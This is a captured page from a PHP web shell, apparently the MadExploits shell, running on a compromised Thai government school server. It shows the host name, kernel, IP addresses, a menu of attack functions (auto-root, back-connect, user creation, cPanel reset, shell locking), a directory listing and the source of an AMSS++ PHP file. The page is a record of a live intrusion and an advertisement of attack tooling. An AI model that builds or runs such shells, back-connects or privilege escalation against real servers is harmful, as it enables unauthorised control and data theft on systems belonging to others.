Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
book /
expand /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
book_detail2.php
6.45
KB
-rw-r--r--
bookdetail_receive_saraban.php
12.01
KB
-rw-r--r--
bookdetail_receive_saraban_non...
7.99
KB
-rw-r--r--
index.php
1.11
KB
-rw-r--r--
livesearch_4.php
681
B
-rw-r--r--
receive.php
12.65
KB
-rw-r--r--
receive_file.php
2.05
KB
-rw-r--r--
receive_none.php
10.18
KB
-rw-r--r--
register_receive.php
5.25
KB
-rw-r--r--
select_send.php
9.17
KB
-rw-r--r--
select_send.php==00
8.75
KB
-rw-r--r--
send_book.php
21.66
KB
-rw-r--r--
send_book.php==00
21.64
KB
-rw-r--r--
send_detail.php
8.03
KB
-rw-r--r--
send_report_book.php
16.4
KB
-rw-r--r--
send_report_book.php===0
15.07
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : receive_file.php
<?php session_start(); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AMSS++</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="stylesheet" href="../../../css/mm_training.css" type="text/css" /> </head> <?php require_once "../../../amssplus_connect.php"; foreach($_GET as $system_key => $system_key_val) { $_GET["$system_key"] =mysqli_real_escape_string($connect,$system_key_val); } $sql = "select * from book_filebook where ref_id='$_GET[ref_id]' "; $dbquery = mysqli_query($connect,$sql); $file_num = mysqli_num_rows($dbquery); if($file_num<>0){ $list = 1 ; echo "<table>"; while ($list<= $file_num&&$row= mysqli_fetch_array($dbquery)){ $file_name = $row ['file_name'] ; $file_des = $row ['file_des'] ; echo "<tr><td align='left'> <FONT SIZE='2'>$list. </FONT><A HREF='../../../modules/book/upload_files/$file_name' title='คลิกเพื่อเปิดไฟล์แนบลำดับที่ $list' target='_BLANK'><FONT SIZE='2' COLOR='#CC0099'><span style='text-decoration: none'>$file_des</span></FONT></A></td></tr>"; $list ++ ; } echo "</table>"; } else{ $sql = "select * from bookregister_send_filebook where ref_id='$_GET[ref_id]' "; $dbquery = mysqli_query($connect,$sql); $file_num = mysqli_num_rows($dbquery); if($file_num<>0){ $list = 1 ; echo "<table>"; while ($list<= $file_num&&$row= mysqli_fetch_array($dbquery)){ $file_name = $row ['file_name'] ; $file_des = $row ['file_des'] ; echo "<tr><td align='left'> <FONT SIZE='2'>$list. </FONT><A HREF='../../../modules/bookregister/upload_files2/$file_name' title='คลิกเพื่อเปิดไฟล์แนบลำดับที่ $list' target='_BLANK'><FONT SIZE='2' COLOR='#CC0099'><span style='text-decoration: none'>$file_des</span></FONT></A></td></tr>"; $list ++ ; } echo "</table>"; } } ?>
Close